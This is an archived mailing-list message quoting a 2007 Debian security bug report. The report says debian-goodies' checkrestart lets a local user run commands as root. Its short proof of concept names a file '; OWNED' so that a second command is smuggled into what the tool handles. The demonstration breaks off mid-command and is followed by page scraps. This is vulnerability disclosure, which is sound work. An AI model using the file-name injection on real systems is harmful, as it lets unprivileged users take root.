On Sat, Sep 01, 2007 at 12:42:19PM +0200, Thomas de Grenier de Latour wrote:
> The checkrestart program from debian-goodies (both latest 0.33 and
> stable 0.27) allows arbitrary command execution with root privileges.
Thanks. I was not aware of this bug.
> Since this program is likely launched as
Package: debian-goodies
Version: 0.33
Severity: grave
Tags: security
Hi,
The checkrestart program from debian-goodies (both latest 0.33 and
stable 0.27) allows arbitrary command execution with root privileges.
Example:
$ cp /bin/sleep "; OWNED"
$ ./"; OWNED" 1000 &
$ rm "; OWNED"
$ sudo che
2 matches
Mail list logo
